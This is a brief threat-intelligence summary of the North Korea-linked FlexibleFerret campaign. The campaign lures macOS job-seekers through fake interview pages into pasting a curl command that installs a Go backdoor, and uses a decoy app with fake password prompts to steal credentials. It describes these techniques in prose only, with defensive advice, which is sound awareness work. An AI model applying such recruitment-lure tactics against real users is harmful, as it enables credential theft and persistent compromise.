DPRK’s FlexibleFerret Tightens macOS Grip
Summary
Jamf Threat Labs reports that the DPRK-linked FlexibleFerret campaign continues to evolve, increasingly targeting macOS users with convincing fake recruitment workflows. The attackers use JavaScript-staged ‘interview’ pages that coax victims into pasting a curl command into Terminal, which fetches an architecture-aware shell loader (Intel or Apple silicon) and a Go-based backdoor. Newer tactics include a signed decoy app (MediaPatcher.app) that prompts for camera permissions and a Chrome-style system password dialogue to harvest credentials, then exfiltrates data (reportedly to Dropbox). The backdoor supports more commands than earlier variants, enabling system info collection, file upload/download, browser and keychain data harvesting, and reliable persistence.
Key Points
- DPRK-aligned actor behind FlexibleFerret is actively refining macOS attacks, focusing on job-recruitment lures.
- Attack flow: tailored ‘hiring assessment’ webpages → social-engineering to run a curl command → architecture-aware shell loader → Go backdoor.
- New persistence and staging improvements include Intel/Apple Silicon detection and a cleaner Go backdoor with expanded capabilities.
- Signed decoy app (MediaPatcher.app) presents fake permission and password prompts to steal credentials and exfiltrate data.
- Technique relies on tricking users to bypass macOS protections (Gatekeeper) by executing Terminal commands themselves.
- Defensive advice: treat unsolicited interview assessments and Terminal ‘fix’ instructions as high risk; organisations should educate staff and monitor for related indicators.
Why should I read this?
Look — if you use a Mac and you apply for jobs online, this is worth two minutes of your time. Attackers are pretending to be recruiters, walking you through fake interview steps and getting you to run commands that let malware in. It isn’t flashy, but it’s effective and getting sharper.
Author style
Punchy: this isn’t just another macOS nuisance — FlexibleFerret shows a clear, targeted push at job-seekers and macOS endpoints. Security teams, HR and anyone who hires remotely should pay close attention: the social engineering is polished, the tooling is improved, and the consequences include stolen credentials and persistent backdoors.
Context and Relevance
This story fits into two ongoing trends: increased APT focus on macOS and highly tailored social-engineering campaigns exploiting remote-hiring workflows. As organisations rely more on remote interviews and online assessments, threat actors mimic legitimate processes to evade technical defences. The campaign underlines the limits of platform protections when users are persuaded to execute commands themselves, and it emphasises the need for combined technical controls and user awareness.